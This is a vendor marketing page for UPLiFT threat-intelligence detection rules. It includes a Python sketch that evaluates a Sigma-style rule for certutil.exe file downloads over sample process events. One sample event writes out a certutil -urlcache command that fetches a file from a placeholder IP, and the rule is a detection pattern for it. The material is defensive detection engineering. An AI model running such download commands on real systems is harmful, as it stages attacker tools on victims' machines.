UPLiFT your SOC Operations team with the latest Threat Actor TTP Rules


Load these rules into your SIEM, WAF, IPS/IDS or EDR to detect, and where the platform allows it block, the techniques threat actors are using in the wild. The rules are written to keep query cost low on platforms such as Splunk, Devo and Elasticsearch.


A large part of SOC engineering is deciding which detections to put in place. That decision is hard without threat intelligence on what adversaries are actually doing. When you know which TTPs threat actors are using, your Return on Detection (ROD) is high: each rule you add covers a real attack rather than wasting analyst and platform time, and your security posture improves with every rule.

Sigma rule Example

The example rule (pictured) shows a number of features:
- A plain-language description of what the rule detects and why
- FastSearch, a rare keyword checked first to reduce computational cost
- Separate Image and CommandLine selections for more precise matching
- A tuning (filter) clause in the selection that is easy to adjust; and
- MITRE ATT&CK framework references


Get detections for the TTPs that are being used in the wild.
When it comes to detections, the three most important factors are:

1) Coverage - the detections cover the attacks that threat actors are actually using;

2) Accuracy - if detections are poorly written or hard to modify, the SOC will experience a large number of false positives; and

3) Computational complexity - each added detection increases the workload of the tool that runs it. In Splunk, for example, as the number of scheduled detection searches grows, analysts' ad hoc searches are queued because there is not enough search capacity left for them.

How does UPLiFT help with this?

Coverage
- We focus on what threat actors are doing. Our intelligence collection is built to identify the TTPs threat actors are actually using, not hypothetical ones.

Accuracy
- We have seen many Sigma rules that will never detect the attack they were written for. Our rule minting process includes quality checks to ensure each rule is written accurately and matches consistently. We have also made the selection criteria easier to change, so tuning a rule for your environment is simpler and the rule is less fragile.

Computational Complexity
- Most security tools can search quickly for a rare term before evaluating the rest of a query. Most Sigma rules do not take advantage of this, so they drain the resources of the SIEM or EDR that runs them. We include a fast-search term as a selection parameter so that each rule finds its condition as early as possible with the least computation. These rules are optimized to reduce compute in Splunk, Devo, Elasticsearch and other SIEM tools.

This comes down to helping security operations understand a threat well enough to prevent future damage. With UPLiFT's threat intelligence rules, you have what you need to stay ahead of threat actors. Our threat intelligence system follows an intelligence-driven analysis process: discovery, profiling, storage, query and ranking. We collect data through a machine-learning-based threat hunting system that gathers information directly from feeds and targets, bringing the system close to the sources where exploits originate. This levels the playing field by providing prompt, decluttered information that helps you check whether you have been compromised and implement new detections based on observed trends.
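As an added example (not UPLiFT's own code or rule format), the following Python sketch puts the features listed under the Sigma rule example and the fast-search ordering described above into working form: a constructed Sigma-style rule with separate Image and CommandLine selections, a tuning filter and ATT&CK tags, evaluated over constructed process-creation events with a cheap raw-text keyword check before any field matching. The `fastsearch` key, the approved-updater filter path, the event lines and the `_raw` field are assumptions made for illustration; the certutil `-urlcache` pattern and the T1105 tag are well known public knowledge, but this rule was written for the demonstration, not taken from the product.

```python
"""Sigma-style rule evaluation with a fast-search pre-filter (illustrative only)."""

# Constructed rule in Sigma's layout. 'fastsearch' is an assumed extension
# (not part of the Sigma specification); the filter path is a placeholder.
RULE = {
    "title": "certutil.exe used to fetch a remote file",
    "description": "certutil.exe invoked with -urlcache, a documented way to pull a "
                   "file from a URL with a signed Windows binary (ATT&CK T1105).",
    "tags": ["attack.command_and_control", "attack.t1105"],
    "fastsearch": "urlcache",  # rare token: checked against the raw event first
    "logsource": {"category": "process_creation", "product": "windows"},
    "detection": {
        "selection_img": {"Image|endswith": "\\certutil.exe"},
        "selection_cli": {"CommandLine|contains": "-urlcache"},
        # Tuning clause: exclude an approved tool that legitimately spawns certutil.
        "filter_tuning": {"ParentImage|startswith": "C:\\Program Files\\ApprovedUpdater\\"},
        "condition": "selection_img and selection_cli and not filter_tuning",
    },
}


def make_event(**fields):
    """Constructed process-creation event with a raw text form, as a SIEM would store it."""
    event = dict(fields)
    event["_raw"] = " ".join(f'{k}="{v}"' for k, v in fields.items())
    return event


# Constructed sample events (not real telemetry).
EVENTS = [
    make_event(Image=r"C:\Windows\System32\certutil.exe",
               CommandLine="certutil -urlcache -split -f http://198.51.100.7/a.txt a.txt",
               ParentImage=r"C:\Windows\System32\cmd.exe"),                  # true positive
    make_event(Image=r"C:\Windows\System32\certutil.exe",
               CommandLine="certutil -urlcache -split -f http://updates.example/p.cab p.cab",
               ParentImage=r"C:\Program Files\ApprovedUpdater\updater.exe"),  # tuned out
    make_event(Image=r"C:\Windows\System32\certutil.exe",
               CommandLine="certutil -hashfile setup.exe SHA256",
               ParentImage=r"C:\Windows\explorer.exe"),                      # benign, no keyword
    make_event(Image=r"C:\Windows\System32\notepad.exe",
               CommandLine="notepad.exe notes.txt",
               ParentImage=r"C:\Windows\explorer.exe"),                      # benign, no keyword
    make_event(Image=r"C:\Windows\System32\cmd.exe",
               CommandLine="cmd /c echo -urlcache",
               ParentImage=r"C:\Windows\explorer.exe"),                      # keyword, wrong image
]


def field_matches(event, key, expected):
    """Apply one Sigma field modifier (contains / endswith / startswith / exact), case-insensitively."""
    name, _, modifier = key.partition("|")
    value = str(event.get(name, "")).lower()
    expected = expected.lower()
    if modifier == "contains":
        return expected in value
    if modifier == "endswith":
        return value.endswith(expected)
    if modifier == "startswith":
        return value.startswith(expected)
    if modifier == "":
        return value == expected
    raise ValueError(f"unsupported modifier: {modifier}")


def selection_matches(event, selection):
    """A selection holds when every field clause in it matches."""
    return all(field_matches(event, k, v) for k, v in selection.items())


def condition_holds(condition, results):
    """Evaluate a conjunction of (optionally negated) selection names.
    Enough for 'a and b and not c'; 'or' and parentheses are out of scope here."""
    outcome = True
    for term in condition.split(" and "):
        term = term.strip()
        negated = term.startswith("not ")
        name = term[4:].strip() if negated else term
        outcome = outcome and (results[name] != negated)
    return outcome


def evaluate(rule, event, stats):
    """Return True if the rule fires on the event; count how much work was needed."""
    token = rule.get("fastsearch")
    if token and token.lower() not in event["_raw"].lower():
        stats["skipped_by_fastsearch"] += 1   # cheap substring test, no field logic run
        return False
    stats["full_evaluations"] += 1
    detection = rule["detection"]
    results = {name: selection_matches(event, sel)
               for name, sel in detection.items() if name != "condition"}
    return condition_holds(detection["condition"], results)


def run(rule, events):
    """Return the indexes of events the rule fires on, plus evaluation counters."""
    stats = {"skipped_by_fastsearch": 0, "full_evaluations": 0}
    hits = [i for i, ev in enumerate(events) if evaluate(rule, ev, stats)]
    return hits, stats


if __name__ == "__main__":
    print(run(RULE, EVENTS))
    without_fast = {k: v for k, v in RULE.items() if k != "fastsearch"}
    print(run(without_fast, EVENTS))  # same hits, but every event is fully evaluated
```

Running it shows the point of each feature: only the first event fires, the second is tuned out by the filter clause alone (no rule rewrite needed), the fifth shows why matching `-urlcache` in the command line is not enough without the Image check, and the two events that never contain the rare token are discarded before any field logic runs. Removing the `fastsearch` key gives the same hits at the cost of evaluating every event.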

Using UPLiFT™ to Mitigate Cyber Threats

Access to the TTPs threat actors are currently using puts you in a strong position to protect your organization. You can deploy our Sigma rules, YARA rules, WAF rules and IOCs across the security tools already in your environment.
Knowing Is Half the Battle